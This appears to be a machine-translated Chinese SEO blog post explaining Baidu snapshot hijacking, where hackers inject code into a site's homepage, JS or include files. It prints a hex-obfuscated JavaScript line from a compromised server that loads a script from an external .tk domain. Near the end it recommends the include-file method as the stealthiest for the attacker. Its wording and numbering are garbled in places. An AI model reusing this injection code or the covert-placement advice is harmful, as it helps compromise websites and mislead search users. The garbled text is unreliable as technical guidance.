百度快照是如何被黑客篡改的经验心得第3张

　　百度快照是如何被黑客篡改的经验心得第3张

　　百度快照劫持是指黑客通过技术手段获取你的网站FTP权限或数据库权限植入代码或添加劫持脚本，将他想要的内容写入页面代码，并在首页的Head标签下调用。当搜索引擎访问您网站并抓取您的网站标题-关键词-描述时，它将抓取黑客设置的任何内容！当然，这只是最简单的方法。 SEO询问建议大家一定要注意网站安全。 . .

　　前段时间，有客户打电话说网站已经不在百度的关键词排名中了。查询下，百度标签上显示的内容为某彩票平台的网站内容。我知道网站被黑客添加到非法代码中，恶意篡改百度快照。 （截图如下）

　　百度快照是如何被黑客篡改的，经验和经验二

　　查看“百度快照”显示一组广告跳转到网站。我们给客户设置的网站信息消失了。

　　百度快照是如何被黑客篡改的，经验与经验3

　　第二部分：下面讲解黑客常用的百度快照劫持方法

　　1、 放在 Head 下劫持快照

　　将代码直接放在首页的Head标签下，搜索引擎抓取网站快照时，可以直接调用页面内容进行劫持，非常简单。 （SEO要求这种方法容易识别，可以直接在网站homepage代码中找到可疑调用页面，清除劫持内容。）

　　2、Disguised JS文件，怀疑是用JS方法实现的

　　比如直接查看源码，没有发现问题。通过FF插件可以看到页面通过SCRIPT脚步加载了一个文件“”，而万网的WHOIS居然提示无法查询TK域名，实属罕见。然而，仍然没有结果。站长工具的WHOIS查询有结果，但是没有任何意义。

　　本地ping，发现域名指向，是不是这里有问题？

　　在服务器的js/file中发现两个问题代码

　　1

　　2

　　var _$=["\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x77\ x77\x77\x2e\x77\x7a\x62\x33\x36\x30\x2e\x74\x6b\/\x69\x6d\x61\x67\x65\x2e\x67\x69\x66\x3e\x3c\/\ x73\x63\x72\x69\x70\x74\x3e"];

　　(_$[0]);

　　1

　　("");

　　第二句是之前找到的问题代码，但是无法访问。

　　第一句是加密的，解密后，Rottenwood 发现和第二句是一样的代码。

　　怀疑是服务器做了特殊处理，只有加载JS格式才能访问。

　　百度快照线索，黑客窃取换帖

　　从快照中可以看出，百度索引的页面并不是我们访问时看到的页面。页面结构由纯 CSS 组成，不调用任何外部文件。顶部有“保定市人民政府”的链接。那么毫无疑问，达到这种效果的方法只有两种：

　　第一种是凌晨更换假主页。对于这样一个高权重的站，百度是绝对不会在晚上休息的，所以假主页每天从0替换到3。这个“主页”肯定会在 3 天内被索引。

　　3、 放入已有的Include文件来劫持快照

　　Include 表示收录，表示Include是首页文件引用的另一个文件。我们将代码添加到这个Include文件中，也可以实现劫持效果。这时候劫持代码不在首页，而是在首页。到收录文件。

　　在选择上，这三种方式中的第一种最为直接方便，直接添加到首页文件即可。第二类和第三类比较隐蔽。第二种只需要在已有的Include文件中添加劫持代码，也非常方便隐蔽。第三种方法也很隐蔽，不过还有两步，一是创建Include文件，二是添加一行引用Include文件的代码。综上，推荐第二种方法。第二种方法比第一种更隐蔽，比第三种方便。

　　SEO问题在线总结：黑客可以通过快照劫持代码实现百度快照劫持，这是黑帽SEO较早的技术。通过劫持webshel​​l网站，他们可以实现自己的网站排名。主要作用是改变webshel​​l网站的快照，使快照显示为你设置的快照。这时候，对方的网站快照（包括标题、关键词、描述就变成了你的）。代码通过实现快照成为你的，当然排名也成为你的。通过内置跳转代码，每次通过搜索引擎点击进去，网站就会跳转到其他网站。这就是百度快照劫持的原理，还有更高级的301权重劫持方法！

　　SEO问要不要网站长期做，一定要注意网站安全。你还觉得网站安全不重要吗？不知道大家看完这个文章有没有行动！